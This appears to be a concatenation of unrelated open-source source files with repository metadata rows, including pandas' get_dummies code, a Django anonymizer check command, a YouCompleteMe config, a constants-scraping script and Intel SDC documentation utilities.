new_names = [this.index.name] # something better?
new_levels.append(level_vals)
new_codes.append(np.tile(level_codes, N))
new_names.append(frame.columns.names[level_num])
new_index = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
result = frame._constructor(new_data, index=new_index, columns=new_columns)
# more efficient way to go about this? can do the whole masking biz but
# will only save a small amount of time...
if dropna:
result = result.dropna(axis=0, how='all')
return result
def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False,
columns=None, sparse=False, drop_first=False, dtype=None):
"""
Convert categorical variable into dummy/indicator variables.
Parameters
----------
data : array-like, Series, or DataFrame
Data of which to get dummy indicators.
prefix : str, list of str, or dict of str, default None
String to append DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : str, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix`.
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
Whether the dummy-encoded columns should be be backed by
a :class:`SparseArray` (True) or a regular NumPy array (False).
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
.. versionadded:: 0.18.0
dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
.. versionadded:: 0.23.0
Returns
-------
DataFrame
Dummy-coded data.
See Also
--------
Series.str.get_dummies : Convert Series to dummy codes.
Examples
--------
>>> s = pd.Series(list('abca'))
>>> pd.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> s1 = ['a', 'b', np.nan]
>>> pd.get_dummies(s1)
a b
0 1 0
1 0 1
2 0 0
>>> pd.get_dummies(s1, dummy_na=True)
a b NaN
0 1 0 0
1 0 1 0
2 0 0 1
>>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]})
>>> pd.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pd.get_dummies(pd.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
>>> pd.get_dummies(pd.Series(list('abc')), dtype=float)
a b c
0 1.0 0.0 0.0
1 0.0 1.0 0.0
2 0.0 0.0 1.0
"""
from pandas.core.reshape.concat import concat
from itertools import cycle
dtypes_to_encode = ['object', 'category']
if isinstance(data, DataFrame):
# determine columns being encoded
if columns is None:
data_to_encode = data.select_dtypes(
include=dtypes_to_encode)
else:
data_to_encode = data[columns]
# validate prefixes and separator to avoid silently dropping cols
def check_len(item, name):
len_msg = ("Length of '{name}' ({len_item}) did not match the "
"length of the columns being encoded ({len_enc}).")
if is_list_like(item):
if not len(item) == data_to_encode.shape[1]:
len_msg = len_msg.format(name=name, len_item=len(item),
len_enc=data_to_encode.shape[1])
raise ValueError(len_msg)
check_len(prefix, 'prefix')
check_len(prefix_sep, 'prefix_sep')
if isinstance(prefix, compat.string_types):
prefix = cycle([prefix])
if isinstance(prefix, dict):
prefix = [prefix[col] for col in data_to_encode.columns]
if prefix is None:
prefix = data_to_encode.columns
# validate separators
if isinstance(prefix_sep, compat.string_types):
prefix_sep = cycle([prefix_sep])
elif isinstance(prefix_sep, dict):
prefix_sep = [prefix_sep[col] for col in data_to_encode.columns]
if data_to_encode.shape == data.shape:
# Encoding the entire df, do not prepend any dropped columns
with_dummies = []
elif columns is not None:
# Encoding only cols specified in columns. Get all cols not in
# columns to prepend to result.
with_dummies = [data.drop(columns, axis=1)]
else:
# Encoding only object and category dtype columns. Get remaining
# columns to prepend to result.
with_dummies = [data.select_dtypes(exclude=dtypes_to_encode)]
for (col, pre, sep) in zip(data_to_encode.iteritems(), prefix,
prefix_sep):
# col is (column_name, column), use just column data here
dummy = _get_dummies_1d(col[1], prefix=pre, prefix_sep=sep,
dummy_na=dummy_na, sparse=sparse,
drop_first=drop_first, dtype=dtype)
with_dummies.append(dummy)
result = concat(with_dummies, axis=1)
else:
result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na,
sparse=sparse,
drop_first=drop_first,
dtype=dtype)
return result
def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False,
sparse=False, drop_first=False, dtype=None):
from pandas.core.reshape.concat import concat
# Series avoids inconsistent NaN handling
codes, levels = _factorize_from_iterable(Series(data))
if dtype is None:
dtype = np.uint8
dtype = np.dtype(dtype)
if is_object_dtype(dtype):
raise ValueError("dtype=object is not a valid dtype for get_dummies")
def get_empty_frame(data):
if isinstance(data, Series):
index = data.index
else:
index = np.arange(len(data))
return DataFrame(index=index)
# if all NaN
if not dummy_na and len(levels) == 0:
return get_empty_frame(data)
codes = codes.copy()
if dummy_na:
codes[codes == -1] = len(levels)
levels = np.append(levels, np.nan)
# if dummy_na, we just fake a nan level. drop_first will drop it again
if drop_first and len(levels) == 1:
return get_empty_frame(data)
number_of_cols = len(levels)
if prefix is None:
dummy_cols = levels
else:
# PY2 embedded unicode, gh-22084
def _make_col_name(prefix, prefix_sep, level):
fstr = '{prefix}{prefix_sep}{level}'
if PY2 and (isinstance(prefix, text_type) or
isinstance(prefix_sep, text_type) or
isinstance(level, text_type)):
fstr = u(fstr)
return fstr.format(prefix=prefix,
prefix_sep=prefix_sep,
level=level)
dummy_cols = [_make_col_name(prefix, prefix_sep, level)
for level in levels]
if isinstance(data, Series):
index = data.index
else:
index = None
if sparse:
if is_integer_dtype(dtype):
fill_value = 0
elif dtype == bool:
fill_value = False
else:
fill_value = 0.0
sparse_series = []
N = len(data)
sp_indices = [[] for _ in range(len(dummy_cols))]
mask = codes != -1
codes = codes[mask]
n_idx = np.arange(N)[mask]
for ndx, code in zip(n_idx, codes):
sp_indices[code].append(ndx)
if drop_first:
# remove first categorical level to avoid perfect collinearity
# GH12042
sp_indices = sp_indices[1:]
dummy_cols = dummy_cols[1:]
for col, ixs in zip(dummy_cols, sp_indices):
sarr = SparseArray(np.ones(len(ixs), dtype=dtype),
sparse_index=IntIndex(N, ixs),
fill_value=fill_value,
dtype=dtype)
sparse_series.append(Series(data=sarr, index=index, name=col))
out = concat(sparse_series, axis=1, copy=False)
return out
else:
dummy_mat = np.eye(number_of_cols, dtype=dtype).take(codes, axis=0)
if not dummy_na:
# reset NaN GH4446
dummy_mat[codes == -1] = 0
if drop_first:
# remove first GH12042
dummy_mat = dummy_mat[:, 1:]
dummy_cols = dummy_cols[1:]
return DataFrame(dummy_mat, index=index, columns=dummy_cols)
def make_axis_dummies(frame, axis='minor', transform=None):
"""
Construct 1-0 dummy variables corresponding to designated axis
labels
Parameters
----------
frame : DataFrame
axis : {'major', 'minor'}, default 'minor'
transform : function, default None
Function to apply to axis labels first. For example, to
get "day of week" dummies in a time series regression
you might call::
make_axis_dummies(panel, axis='major',
transform=lambda d: d.weekday())
Returns
-------
dummies : DataFrame
Column names taken from chosen axis
"""
numbers = {'major': 0, 'minor': 1}
num = numbers.get(axis, axis)
items = frame.index.levels[num]
codes = frame.index.codes[num]
if transform is not None:
mapped_items = items.map(transform)
codes, items = _factorize_from_iterable(mapped_items.take(codes))
values = np.eye(len(items), dtype=float)
values = values.take(codes, axis=0)
return DataFrame(values, columns=items, index=frame.index)
def _reorder_for_extension_array_stack(arr, n_rows, n_columns):
"""
Re-orders the values when stacking multiple extension-arrays.
The indirect stacking method used for EAs requires a followup
take to get the order correct.
Parameters
----------
arr : ExtensionArray
n_rows, n_columns : int
The number of rows and columns in the original DataFrame.
Returns
-------
taken : ExtensionArray
The original `arr` with elements re-ordered appropriately
Examples
--------
>>> arr = np.array(['a', 'b', 'c', 'd', 'e', 'f'])
>>> _reorder_for_extension_array_stack(arr, 2, 3)
array(['a', 'c', 'e', 'b', 'd', 'f'], dtype='<U1')
>>> _reorder_for_extension_array_stack(arr, 3, 2)
array(['a', 'd', 'b', 'e', 'c', 'f'], dtype='<U1')
"""
# final take to get the order correct.
# idx is an indexer like
# [c0r0, c1r0, c2r0, ...,
# c0r1, c1r1, c2r1, ...]
idx = np.arange(n_rows * n_columns).reshape(n_columns, n_rows).T.ravel()
return arr.take(idx)
| bsd-3-clause | 777,959,914,915,552,400 | 34.017208 | 79 | 0.577209 | false |
BetterWorks/django-anonymizer | anonymizer/management/commands/check_anonymizers.py | 1 | 1139 | from django.core.management import CommandError
from django.core.management.base import AppCommand
from anonymizer.utils import get_anonymizers
try:
unicode
except NameError:
unicode = str # python 3
class Command(AppCommand):
def add_arguments(self, parser):
parser.add_argument('args', metavar='app_label', nargs='+',
help='One or more app names.')
def handle_app_config(self, app_config, **options):
anonymizers = get_anonymizers(app_config)
models = set()
errors = []
for klass in anonymizers:
models.add(klass.model)
instance = klass()
try:
instance.validate()
except ValueError as e:
errors.append(unicode(e))
for model in app_config.get_models():
if model._meta.abstract or model._meta.proxy:
continue
if model not in models:
errors.append(u'need anonymizer for %s' % model)
if errors:
raise CommandError('%d errors\n%s' % (len(errors), '\n'.join(errors)))
return 0
| mit | 3,961,398,319,339,451,400 | 28.205128 | 82 | 0.579456 | false |
Cyberdr8gon/matviz | .ycm_extra_conf.py | 1 | 5050 | # Generated by YCM Generator at 2017-02-03 10:06:47.051388
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import ycm_core
flags = [
'-x',
'c++',
'-DGTEST_HAS_PTHREAD=1',
'-I/home/sam/workspace/matviz/include',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googlemock',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googlemock/include',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googletest',
'-I/tmp/tmpJPcIec/ext/gtest/src/googletest/googletest/include',
'-isystem /usr/include',
'-std=c++14'
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
| gpl-3.0 | 7,470,624,663,713,526,000 | 33.827586 | 79 | 0.705743 | false |
ZombieAlex/MFCAuto | src/main/genConstants.py | 1 | 3164 | import re
from urllib.request import urlopen
import json
serverConfig = "https://www.myfreecams.com/_js/serverconfig.js"
url = "https://www.myfreecams.com/_js/mfccore.js"
# Maybe it's wrong to merge in the w. stuff? Is that all just for the UI?
constantRe = re.compile(r'(\s|;?|,)(FCS|w)\.([A-Z0-9]+)_([A-Z0-9_]+)\s+?=\s+?([0-9]+);')
constantMap = dict()
header = """// Various constants and enums used by MFC. Most of these values can be seen here:
// http://www.myfreecams.com/_js/mfccore.js
export const MAGIC = -2027771214;
export const FLASH_PORT = 8100;
export const WEBSOCKET_PORT = 8080;
// STATE is essentially the same as FCVIDEO but has friendly names
// for better log messages and code readability
export enum STATE {
FreeChat = 0, // TX_IDLE
// TX_RESET = 1, // Unused?
Away = 2, // TX_AWAY
// TX_CONFIRMING = 11, // Unused?
Private = 12, // TX_PVT
GroupShow = 13, // TX_GRP
// TX_RESERVED = 14, // Unused?
// TX_KILLMODEL = 15, // Unused?
// C2C_ON = 20, // Unused?
// C2C_OFF = 21, // Unused?
Online = 90, // RX_IDLE
// RX_PVT = 91, // Unused?
// RX_VOY = 92, // Unused?
// RX_GRP = 93, // Unused?
// NULL = 126, // Unused?
Offline = 127, // OFFLINE
}
// Version number to pass along with our
// FCTYPE_LOGIN login requests
//
// The latest Flash version number is here:
// https://www.myfreecams.com/js/wsgw.js
// The latest WebSocket version number is here:
// http://m.myfreecams.com/source.min.js
export enum LOGIN_VERSION {
FLASH = 20071025,
WEBSOCKET = 20080910,
}
"""
#Add our own constants...
constantMap.setdefault("FCTYPE", dict())["CLIENT_MANUAL_DISCONNECT"] = -6
constantMap.setdefault("FCTYPE", dict())["CLIENT_DISCONNECTED"] = -5
constantMap.setdefault("FCTYPE", dict())["CLIENT_MODELSLOADED"] = -4
constantMap.setdefault("FCTYPE", dict())["CLIENT_CONNECTED"] = -3
constantMap.setdefault("FCTYPE", dict())["ANY"] = -2
constantMap.setdefault("FCTYPE", dict())["UNKNOWN"] = -1
with urlopen(url) as data:
scriptText = data.read().decode('utf-8')
result = constantRe.findall(scriptText)
for (prefix1, prefix2, fctype, subtype, num) in result:
constantMap.setdefault(fctype, dict())[subtype] = num
with open("Constants.ts", "w") as f:
f.write(header)
for fctype in sorted(constantMap):
f.write("\nexport enum {} {{\n".format(fctype))
for subtype, value in sorted(constantMap[fctype].items(), key=lambda x: int(x[1])):
f.write(' "{}" = {},\n'.format(subtype, value))
f.write("}\n")
with urlopen(serverConfig) as configData:
configText = configData.read().decode('utf-8')
config = json.loads(configText)
configText = json.dumps(config, indent=4, sort_keys=True)
f.write("\n// tslint:disable:trailing-comma\n")
f.write("export const CACHED_SERVERCONFIG = {}".format(configText))
f.write(";\n// tslint:enable:trailing-comma\n")
print("Done")
| mit | 4,662,721,920,012,275,000 | 38.061728 | 95 | 0.599874 | false |
IntelLabs/hpat | docs/source/buildscripts/sdc_object_utils.py | 1 | 16472 | # -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
from inspect import getmembers, ismodule, isclass, isfunction
import sys
import pandas
import sdc
from sdc_doc_utils import is_sdc_user_guide_header, get_docstring, split_title, extract_pandas_name_from
# -- Pandas submodules to be excluded from API Reference ---------------------------------------------
exclude_pandas_submodules = [
'pandas.compat', # This is PRIVATE submodule
'pandas.util', # This is PRIVATE submodule
'pandas.api.extensions', # This is extension for library developers extending Pandas
'pandas.testing', # Utility functions for testing. Not a priority for SDC
'pandas.plotting', # Plotting functions. Not a priority for compiling with SDC
'pandas.errors', # Error handling functionality. Not a priority for SDC
'pandas.api.types', # Not a priority for SDC
'pandas.io.formats.style', # Helps to style dataframes with HTML and CSS. Not a priority for SDC
'pandas.arrays', # Array extensions for Numpy. We do not explicitly cover in SDC documentation now
'pandas.tseries', # SDC does not yet support Time Series objects
'pandas.core.dtypes.dtypes',
]
# -- Intel SDC submodules to be excluded from API Reference -------------------------------------------
exclude_sdc_submodules = [
'sdc.chiframes',
'sdc.compiler',
'sdc.config',
'sdc.io.pio',
'sdc.io.pio_api',
'sdc.io.pio_lower',
'sdc.utilities.utils',
'sdc.utilities.sdc_typing_utils',
'sdc.hstr_ext',
'sdc.datatypes.common_functions',
'sdc.datatypes.hpat_pandas_dataframe_pass',
'sdc.decorators',
'sdc.dict_ext',
'sdc.hdict_ext',
'sdc.distributed',
'sdc.distributed_api',
'sdc.transport_seq',
'sdc.distributed_lower',
'sdc.hdist',
'sdc.distributed_analysis',
'sdc.hdatetime_ext',
'sdc.hiframes',
'sdc.io.csv_ext',
'sdc.hio',
'sdc.hiframes.join',
'sdc.io.parquet_pio',
'sdc.parquet_cpp',
'sdc.shuffle_utils',
'sdc.str_arr_ext',
'sdc.str_ext',
'sdc.timsort',
]
pandas_modules = dict() # Dictionary of pandas submodules and their classes and functions
sdc_modules = dict() # Dictionary of Intel SDC submodules and their classes and functions
pandas_sdc_dict = dict() # Dictionary {<pandas_obj>: <sdc_obj>} that maps Pandas API to respective Intel SDC API
def get_sdc_object(pandas_obj):
"""
Returns corresponding Intel SDC object for a given Pandas object pandas_obj.
:param pandas_obj: Pandas object to be matched with Intel SDC object
:return: Intel SDC object corresponding to pandas_obj
"""
if pandas_obj in pandas_sdc_dict:
return pandas_sdc_dict[pandas_obj]
else:
return None # There is no match in Intel SDC to pandas_obj
def get_sdc_object_by_pandas_name(pandas_name):
"""
Returns corresponding Intel SDC object for a given Pandas object given as string ``pandas_name``.
This function is needed because :func:`get_sdc_object` cannot uniquely match Intel SDC and Pandas objects.
For example, the same Pandas object represents :meth:`Series.get` and :meth:`DataFrame.get` methods. As a result
that :func:`get_sdc_object` will return **some** SDC object that matches respective Pandas object. If you need
unique match between Pandas and Intel SDC use :func:`get_sdc_object_by_pandas_name` function instead. (Which
should be the case for majority usecases).
:param pandas_name: Pandas object to be matched with Intel SDC object
:return: Intel SDC object corresponding to Pandas object having ``pandas_name`` name
"""
if pandas_name in pandas_sdc_dict:
return pandas_sdc_dict[pandas_name]
else:
return None # There is no match in Intel SDC to pandas_obj
def init_pandas_sdc_dict():
"""
Initializes global dictionary that performs mapping between Pandas objects and SDC objects.
To function correctly this function must be called after initialization of ``sdc_modules`` and ``pandas_modules``
lists by :func:`init_sdc_structure` and :func:`init_pandas_structure`` functions respectively.
"""
def _map_sdc_to_pandas(sdc_obj):
if isfunction(sdc_obj):
doc = get_docstring(sdc_obj)
# The very first section of Intel SDC documentation is expected to start with
# the User Guide header followed by the name of respective Pandas API.
# The following code extracts respective Pandas API
title, text = split_title(doc)
if is_sdc_user_guide_header((title, text)):
pandas_name = extract_pandas_name_from(text)
pandas_obj = get_obj(pandas_name)
pandas_sdc_dict[pandas_obj] = sdc_obj
pandas_sdc_dict[pandas_name] = sdc_obj
return False
global pandas_sdc_dict
pandas_sdc_dict = {}
traverse(sdc_modules, _map_sdc_to_pandas, True)
def get_obj(obj_name):
"""
Retrieves object corresponding to fully qualified name obj_name.
The fully qualified name starts with the imported module name visible by sys.modules followed by
submodules and then classes and finally by class attributes
:param obj_name: Fully qualified object name string
:return: If found, returns the object corresponding to obj_name. Otherwise raises exception
:raises AttributeError: If submodule or attribute does not exists
"""
split_name = obj_name.split('.')
split_obj = sys.modules[split_name[0]]
# Iterate through submodules
while ismodule(split_obj) and len(split_name) > 1:
split_name.pop(0)
not_found = True
for (name, obj) in getmembers(split_obj): # Go through members of split_obj
if split_name[0] == name:
not_found = False
break
if not_found:
raise AttributeError('Member `' + split_name[0] + '` for `' + obj_name + '` does not exists')
split_obj = obj
split_name.pop(0)
for name in split_name:
split_obj = getattr(split_obj, name)
return split_obj
def get_class_methods(cls):
"""
Returns the list of class methods, accessible by both names and as objects.
Function ignores internal methods starting with ``_``.
:param cls: The class object
:return: List of class methods, each item is the tuple ``(method_name, method_object)``
"""
return [(func, getattr(cls, func)) for func in dir(cls)
if callable(getattr(cls, func)) and not func.startswith('_')]
def get_class_attributes(cls):
"""
Returns the list of class attributes, accessible by both names and as objects.
Function ignores internal attributes starting with ``_``.
:param cls: The class object
:return: List of class attributes, each item is the tuple ``(attribute_name, attribute_object)``
"""
return [(func, getattr(cls, func)) for func in dir(cls)
if not callable(getattr(cls, func)) and not func.startswith('_')]
def get_fully_qualified_name(cls):
"""
Returns fully qualified name of the class.
:param cls: The class object
:return: String, fully qualified name
"""
return repr(cls)[8:-2]
def init_module_structure(module_obj, the_module, inspected, skip_test):
"""
Initializes hierarchical structure ``the_module``.
:param module_obj: Module object being traversed.
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
The functions is the list of functions that belong ``to module_obj``.
:param inspected: Set of already traversed module objects. This set is needed to avoid circular traversal of
the same module, which may be returned by by ``getmembers`` function multiple times.
:param skip_test: Function that takes module object as an argument and returns True if this object
needs to be included in the module structure hierarchy or skipped if False. This function is used as
a mechanism to customize the structure of modules, classes, and functions. This in turn minimizes following
structure traversal costs.
"""
# Returns True if the mod module needs to be ignored
def _is_skip_module(mod):
mod_name = mod.__name__
return '._' in mod_name or mod_name.startswith('_')
# Returns True if the class cls needs to be ignored
def _is_skip_class(cls):
class_name = get_fully_qualified_name(cls)
return '._' in class_name
# Returns True if the object obj needs to be ignored
def _is_internal(obj):
obj_name = obj.__name__
return obj_name.startswith('_')
# ************ The init_module_structure implementation starts here *******************************************
if _is_skip_module(module_obj) or module_obj in inspected or skip_test(module_obj):
return
inspected.add(module_obj)
# Traverse submodules, classes, and functions
submodules = []
classes = []
functions = []
for (name, obj) in getmembers(module_obj): # Iterate through members of the submodule
if skip_test(obj):
continue # Customizable test for skipping objects as needed
if ismodule(obj) and obj not in inspected and not _is_skip_module(obj):
the_submodule = dict()
init_module_structure(obj, the_submodule, inspected, skip_test)
submodules.append(the_submodule)
if isclass(obj) and not _is_skip_class(obj):
classes.append(obj)
if isfunction(obj) and not _is_internal(obj):
functions.append(obj)
the_module['module_obj'] = module_obj
the_module['submodules'] = submodules
the_module['classes'] = classes
the_module['functions'] = functions
def _print_module(the_module, print_submodules_flag=True):
"""
Recursively prints ``the_module`` content. Internal utility function for debugging purposes
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
The functions is the list of functions that belong ``to module_obj``.
"""
print(the_module['module_obj'].__name__)
print(' CLASSES:')
for the_class in the_module['classes']:
print(' - ' + the_class.__name__)
print(' FUNCTIONS:')
for the_func in the_module['functions']:
print(' - ' + the_func.__name__)
if print_submodules_flag:
print(' SUBMODULES:')
for submodule in the_module['submodules']:
_print_module(submodule, print_submodules_flag)
def traverse(the_module, do_action, traverse_submodules_flag=True):
"""
Traverses ``the_module`` and performs action :func:`do_action` on each of the objects of the structure.
:param the_module: Dictionary ``{'module_obj': module_obj, 'submodules': submodules,
'classes': classes, 'functions': functions}``. The ``submodules`` is the list of
submodules that belong to ``module_obj``. Each submodule has the same structure as ``the_module``.
The ``classes`` is the list of classes that belong to ``module_obj``.
The functions is the list of functions that belong to ``module_obj``.
:param do_action: Function that takes one parameter ``module_obj`` as input. It returns ``True`` if
traversal needs to be stopped.
:param traverse_submodules_flag: True if function must recursively traverse submodules too
:return: Returns tuple ``(the_module, obj)`` where ``obj`` is the object identified by :func:`do_action` and
``the_module`` is the corresponding dictionary structure to which the object belongs. It returns ``None``
if no object has been identified by the :func:`do_action`
"""
if do_action(the_module['module_obj']):
return the_module, the_module['module_obj']
# Traverse classes of the_module
for the_class in the_module['classes']:
if do_action(the_class):
return the_module, the_class
# Traverse functions of the_module
for the_func in the_module['functions']:
if do_action(the_func):
return the_module, the_func
# Recursively traverse submodules of the_module
if traverse_submodules_flag:
for submodule in the_module['submodules']:
the_tuple = traverse(submodule, do_action, traverse_submodules_flag)
if the_tuple is not None:
return the_tuple
return None
def get_pandas_module_structure(pandas_obj):
"""
Returns corresponding ``the_module`` dictionary structure to which ``pandas_obj`` belongs to.
This function is typically used in conjunction with :func:`traverse`
:param pandas_obj:
:return: ``the_module`` dictionary structure
"""
def _find(obj):
return obj == pandas_obj
the_module, the_object = traverse(pandas_modules, _find)
return the_module
def init_pandas_structure():
"""
Initializes ``pandas_modules`` global dictionary representing the structure of Pandas.
"""
# Test that allows to ignore certain Pandas submodules, classes, or attributes
def _skip_pandas_test(obj):
if ismodule(obj):
name = obj.__name__
for mod_name in exclude_pandas_submodules:
if name.startswith(mod_name):
return True
return not name.startswith('pandas')
global pandas_modules
pandas_modules = dict()
inspected_mods = set()
init_module_structure(pandas, pandas_modules, inspected_mods, _skip_pandas_test)
def init_sdc_structure():
"""
Initializes ``sdc_modules`` global dictionary representing the structure of Intel SDC.
"""
# Test that allows to ignore certain Intel SDC submodules, classes, or attributes
def _skip_sdc_test(obj):
if ismodule(obj):
name = obj.__name__
for mod_name in exclude_sdc_submodules:
if name.startswith(mod_name):
return True
return not name.startswith('sdc') and not name.startswith('hpat')
global sdc_modules
sdc_modules = dict()
inspected_mods = set()
init_module_structure(sdc, sdc_modules, inspected_mods, _skip_sdc_test)
if __name__ == "__main__":
init_pandas_structure()
_print_module(pandas_modules)
init_sdc_structure()
_print_module(sdc_modules)
init_pandas_sdc_dict()
print(pandas_sdc_dict)
| bsd-2-clause | -2,698,024,070,761,685,500 | 38.78744 | 117 | 0.659301 | false |
rdnetto/Kv-Creator | MainWindow.py | 1 | 2302 |
import kivy.app
import kivy.lang
import traceback
from threading import Thread
from PySide.QtGui import *
from Queue import Queue
from creator_ui import Ui_MainWindow
from kvparser import *
def ErrorHandler(func):
'''Function decorator for displaying exceptions'''
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception:
traceback.print_exc()
QMessageBox.critical(None, "Error", traceback.format_exc())
QApplication.exit(1)
return wrapper
class MainWindow(Ui_MainWindow, QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.demoThread = None
self.actionOpen.triggered.connect(self.openFile)
self.actionSave.triggered.connect(self.saveFile)
@ErrorHandler
def openFile(self):
if(self.demoThread is not None and self.demoThread.is_alive()):
raise Exception("File already open")
# graphically load file in kivy thread
rootQueue = Queue()
path = "test.kv"
self.demoThread = Thread(name="kivy", target=demo, args=[path, rootQueue])
self.demoThread.daemon = True
self.demoThread.start()
